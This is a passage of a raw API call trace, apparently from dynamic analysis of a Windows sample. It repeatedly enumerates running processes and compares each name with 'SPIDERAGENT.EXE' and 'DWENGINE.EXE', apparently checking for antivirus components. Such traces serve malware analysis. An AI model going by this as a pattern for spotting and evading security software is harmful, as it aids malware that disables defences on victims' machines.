(lpString1="SPPSVC.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.438] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.439] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.439] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.439] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.439] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.439] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.440] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.440] lstrlenW (lpString="svchost.exe") returned 11 [0163.440] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.440] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.440] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.441] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.441] lstrlenW (lpString="svchost.exe") returned 11 [0163.441] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.441] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.441] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.442] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.442] lstrlenW (lpString="winpoint.exe") returned 12 [0163.442] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.442] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.442] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.443] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.443] lstrlenW (lpString="cmd.exe") returned 7 [0163.443] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.443] lstrcmpW (lpString1="CMD.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.443] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.443] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.443] lstrlenW (lpString="conhost.exe") returned 11 [0163.443] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.444] lstrcmpW (lpString1="CONHOST.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.444] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.444] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.444] lstrlenW (lpString="PING.EXE") returned 8 [0163.444] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.444] lstrcmpW (lpString1="PING.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.444] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.445] CloseHandle (hObject=0xe0) returned 1 [0163.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.447] lstrcpyW (in: lpString1=0x18f8e4, lpString2="DWENGINE.EXE" | out: lpString1="DWENGINE.EXE") returned="DWENGINE.EXE" [0163.447] lstrlenW (lpString="DWENGINE.EXE") returned 12 [0163.447] CharUpperBuffW (in: lpsz="DWENGINE.EXE", cchLength=0xc | out: lpsz="DWENGINE.EXE") returned 0xc [0163.447] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.447] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.447] lstrlenW (lpString="[System Process]") returned 16 [0163.447] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.447] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="DWENGINE.EXE") returned -1 [0163.448] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.448] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.448] lstrlenW (lpString="System") returned 6 [0163.448] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.448] lstrcmpW (lpString1="SYSTEM", lpString2="DWENGINE.EXE") returned 1 [0163.448] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.449] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.449] lstrlenW (lpString="smss.exe") returned 8 [0163.449] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.449] lstrcmpW (lpString1="SMSS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.449] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.450] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.450] lstrlenW (lpString="csrss.exe") returned 9 [0163.450] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.450] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.450] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.450] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.450] lstrlenW (lpString="wininit.exe") returned 11 [0163.450] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.450] lstrcmpW (lpString1="WININIT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.450] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.451] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.451] lstrlenW (lpString="csrss.exe") returned 9 [0163.451] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.451] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.451] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.452] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.452] lstrlenW (lpString="winlogon.exe") returned 12 [0163.452] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.452] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.452] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.453] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.453] lstrlenW (lpString="services.exe") returned 12 [0163.453] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.453] lstrcmpW (lpString1="SERVICES.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.453] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.453] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.453] lstrlenW (lpString="lsass.exe") returned 9 [0163.453] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.453] lstrcmpW (lpString1="LSASS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.453] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.454] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.454] lstrlenW (lpString="lsm.exe") returned 7 [0163.454] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.454] lstrcmpW (lpString1="LSM.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.454] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.455] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.455] lstrlenW (lpString="svchost.exe") returned 11 [0163.455] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.455] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.455] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.456] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.456] lstrlenW (lpString="svchost.exe") returned 11 [0163.456] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.456] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.456] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.456] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.456] lstrlenW (lpString="svchost.exe") returned 11 [0163.456] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.456] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.456] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.457] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.457] lstrlenW (lpString="svchost.exe") returned 11 [0163.457] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.457] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.457] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.458] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.458] lstrlenW (lpString="svchost.exe") returned 11 [0163.458] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.458] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.458] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.459] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.459] lstrlenW (lpString="audiodg.exe") returned 11 [0163.459] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.459] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.459] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.460] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.460] lstrlenW (lpString="svchost.exe") returned 11 [0163.460] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.460] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.460] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.460] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.460] lstrlenW (lpString="svchost.exe") returned 11 [0163.460] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.460] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.460] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.461] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.461] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.461] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.461] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.461] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.462] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.462] lstrlenW (lpString="svchost.exe") returned 11 [0163.462] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.462] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.462] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.463] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.463] lstrlenW (lpString="taskhost.exe") returned 12 [0163.463] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.463] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.463] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.463] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.463] lstrlenW (lpString="taskeng.exe") returned 11 [0163.463] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.463] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.464] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.464] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.464] lstrlenW (lpString="dwm.exe") returned 7 [0163.464] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.464] lstrcmpW (lpString1="DWM.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.464] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.465] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.465] lstrlenW (lpString="explorer.exe") returned 12 [0163.465] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.465] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.465] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.466] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.466] lstrlenW (lpString="taskeng.exe") returned 11 [0163.466] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.466] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.466] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.466] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.466] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.466] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.466] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.466] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.467] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.467] lstrlenW (lpString="taskhost.exe") returned 12 [0163.467] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.467] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.467] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.468] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.468] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.468] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.468] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.468] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.469] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.469] lstrlenW (lpString="tri.exe") returned 7 [0163.469] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.469] lstrcmpW (lpString1="TRI.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.469] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.469] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.470] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.470] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.470] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="DWENGINE.EXE") returned 1 